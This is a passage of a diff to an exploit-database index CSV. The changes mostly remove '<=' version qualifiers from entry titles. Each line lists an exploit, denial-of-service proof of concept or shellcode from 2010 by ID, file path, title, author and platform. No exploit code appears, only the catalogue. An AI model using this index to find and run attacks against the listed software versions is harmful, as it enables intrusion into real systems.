-15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 +15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 SQL Injection",2010-09-26,KnocKout,php,webapps,0 -15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= 3.1 - (eCal Module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 +15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 - (eCal Module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS Directory Traversal",2010-09-26,mr_me,cfm,webapps,0 15121,platforms/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,php,webapps,0 15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection",2010-09-27,Abysssec,asp,webapps,0 15126,platforms/php/webapps/15126.txt,"Entrans SQL Injection Vulnerablility",2010-09-27,keracker,php,webapps,0 -15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 +15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - (.m3u) Denial of Service",2010-09-27,4n0nym0us,windows,dos,0 15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh Exploit",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0 @@ -13187,7 +13187,7 @@ id,file,description,date,author,platform,type,port 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0 -15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - (id) Remote SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 +15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - (id) SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 15155,platforms/linux/local/15155.c,"XFS Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 @@ -13206,7 +13206,7 @@ id,file,description,date,author,platform,type,port 15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (Python)",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 -15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 +15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 @@ -13229,7 +13229,7 @@ id,file,description,date,author,platform,type,port 15213,platforms/asp/remote/15213.pl,"ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win_x86,dos,19813 15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) Resource Exhaustion + Remote ftpd-anon (0Day)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 -15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 +15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Remote File Upload",2010-10-07,KnocKout,php,webapps,0 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0 @@ -13238,10 +13238,10 @@ id,file,description,date,author,platform,type,port 15222,platforms/php/webapps/15222.txt,"Joomla Community Builder Enhenced (CBE) Component LFI/RCE",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame Multiple SQL Injection Vulnerabilities",2010-10-09,KnocKout,php,webapps,0 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 -15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 -15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 +15225,platforms/php/webapps/15225.txt,"videodb 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 +15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 -15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 +15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 @@ -13284,9 +13284,9 @@ id,file,description,date,author,platform,type,port 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0 15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos,0 15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos,0 -15259,platforms/windows/dos/15259.txt,"DATAC RealWin <= 2.0 (Build 6.1.8.10) - Buffer Overflow Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 -15260,platforms/windows/dos/15260.txt,"Rocket Software UniData <= 7.2.7.3806 - Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 -15261,platforms/multiple/dos/15261.txt,"IBM solidDB <= 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0 +15259,platforms/windows/dos/15259.txt,"DATAC RealWin 2.0 (Build 6.1.8.10) - Buffer Overflow Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 +15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 +15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 15265,platforms/asp/remote/15265.rb,"ASP.NET Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Windows NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0 @@ -13302,7 +13302,7 @@ id,file,description,date,author,platform,type,port 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF",2010-10-19,KnocKout,php,webapps,0 -15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 +15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - (.ogg) Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service",2010-10-22,"MOHAMED ABDI",windows,dos,0 @@ -13316,8 +13316,8 @@ id,file,description,date,author,platform,type,port 15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 / 6.5 - Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0 -15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 - (.m3u) Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos,0 -15306,platforms/win_x86/dos/15306.pl,"AnyDVD <= 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos,0 +15305,platforms/windows/dos/15305.pl,"RarmaRadio 2.53.1 - (.m3u) Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos,0 +15306,platforms/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos,0 15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 Persistent XSS",2010-10-24,"Th3 RDX",php,webapps,0 15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection",2010-10-24,ZonTa,php,webapps,0 15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 @@ -13352,19 +13352,19 @@ id,file,description,date,author,platform,type,port 15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15341,platforms/multiple/dos/15341.html,"Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 15342,platforms/multiple/dos/15342.html,"Firefox - Memory Corruption Proof of Concept (Simplified)",2010-10-28,extraexploit,multiple,dos,0 -15343,platforms/php/webapps/15343.php,"RoSPORA <= 1.5.0 - Remote PHP Code Injection",2010-10-28,EgiX,php,webapps,0 -15344,platforms/linux/local/15344.c,"Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0 -15345,platforms/php/webapps/15345.txt,"TFTgallery <= 0.13.1 - Local File Inclusion",2010-10-28,Havok,php,webapps,0 +15343,platforms/php/webapps/15343.php,"RoSPORA 1.5.0 - Remote PHP Code Injection",2010-10-28,EgiX,php,webapps,0 +15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0 +15345,platforms/php/webapps/15345.txt,"TFTgallery 0.13.1 - Local File Inclusion",2010-10-28,Havok,php,webapps,0 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS Blind SQL Injection",2010-10-28,H4f,php,webapps,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 -15350,platforms/php/webapps/15350.rb,"PHPKit <= 1.6.1 R2 overview.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 -15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 +15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 overview.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 +15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload",2010-10-30,Net.Edit0r,php,webapps,0 -15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0 +15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 @@ -13373,15 +13373,15 @@ id,file,description,date,author,platform,type,port 15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) SQL Injection",2010-10-31,FL0RiX,php,webapps,0 15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) SQL Injection",2010-10-31,FL0RiX,php,webapps,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Remote Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 -15369,platforms/php/webapps/15369.php,"Auto CMS <= 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 -15370,platforms/php/webapps/15370.txt,"XAMPP <= 1.7.3 - Multiple vulnerabilites",2010-11-01,TheLeader,php,webapps,0 +15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 +15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple vulnerabilites",2010-11-01,TheLeader,php,webapps,0 15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit (0Day)",2010-11-01,"Nikita Tarakanov",windows,local,0 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - '*.SQL' Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0 -15382,platforms/asp/webapps/15382.txt,"douran portal <= 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 +15382,platforms/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 15383,platforms/windows/dos/15383.c,"Rising RSNTGDI.sys Local Denial of Service",2010-11-02,ze0r,windows,dos,0 15384,platforms/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service Exploit",2010-11-02,"Nikita Tarakanov",windows,dos,0 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 @@ -13419,7 +13419,7 @@ id,file,description,date,author,platform,type,port 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal (0Day)",2010-11-05,"Yakir Wizman",windows,remote,0 -15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 +15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) SQL Injection",2010-11-05,FL0RiX,php,webapps,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment NULL Pointer Deference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 @@ -13439,7 +13439,7 @@ id,file,description,date,author,platform,type,port 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 -15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 +15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) - Local File Inclusion",2010-11-08,"ALTBTA ",php,webapps,0 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -13460,7 +13460,7 @@ id,file,description,date,author,platform,type,port 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection",2010-11-09,CoBRa_21,php,webapps,0 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection",2010-11-09,CoBRa_21,php,webapps,0 15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI",2010-11-09,CoBRa_21,php,webapps,0 -15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0 +15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF",2010-11-09,"Fatih Kilic",multiple,webapps,0 15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow",2010-11-09,"Fatih Kilic",multiple,dos,0 @@ -13468,7 +13468,7 @@ id,file,description,date,author,platform,type,port 15476,platforms/multiple/dos/15476.php,"IBM OmniFind Crawler Denial of Service",2010-11-09,"Fatih Kilic",multiple,dos,0 15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - XSS",2010-11-11,"Philipp Niedziela",php,webapps,0 15480,platforms/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit",2010-11-10,"C4SS!0 G0M3S",windows,local,0 -15481,platforms/linux/local/15481.c,"Linux Kernel <= 2.4.0 - Stack Infoleaks",2010-11-10,"Dan Rosenberg",linux,local,0 +15481,platforms/linux/local/15481.c,"Linux Kernel 2.4.0 - Stack Infoleaks",2010-11-10,"Dan Rosenberg",linux,local,0 15482,platforms/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow",2010-11-10,PoisonCode,windows,dos,0 15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injection Vulnerabilities",2010-11-10,"Salvatore Fresta",php,webapps,0 @@ -13488,7 +13488,7 @@ id,file,description,date,author,platform,type,port 15508,platforms/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera Denial of Service",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 -15512,platforms/php/webapps/15512.py,"DBSite Remote SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 +15512,platforms/php/webapps/15512.py,"DBSite SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 15513,platforms/php/webapps/15513.txt,"WordPress Event Registration Plugin 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 15514,platforms/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,windows,dos,0 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0 @@ -13525,7 +13525,7 @@ id,file,description,date,author,platform,type,port 15565,platforms/php/webapps/15565.txt,"Front Accounting 2.3RC2 - Multiple SQL Injection Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0 -15568,platforms/php/webapps/15568.py,"chCounter <= 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 +15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 - (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -13541,22 +13541,22 @@ id,file,description,date,author,platform,type,port 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation",2010-11-20,LiquidWorm,windows,local,0 15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0 -16087,platforms/php/webapps/16087.txt,"PMB Services <= 3.4.3 - SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 +16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0Day)",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 -15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection",2010-11-25,Beach,php,webapps,0 -15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",windows,dos,0 +15612,platforms/php/webapps/15612.txt,"SiteEngine 7.1 - SQL Injection",2010-11-25,Beach,php,webapps,0 +15613,platforms/windows/dos/15613.py,"NCH Officeintercom 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",windows,dos,0 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 -15619,platforms/linux/dos/15619.c,"Linux Kernel <= 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0 +15619,platforms/linux/dos/15619.c,"Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0 15620,platforms/linux/local/15620.sh,"systemtap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 -15622,platforms/linux/dos/15622.c,"Linux Kernel <= 2.6.37 - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 +15622,platforms/linux/dos/15622.c,"Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 - user agent 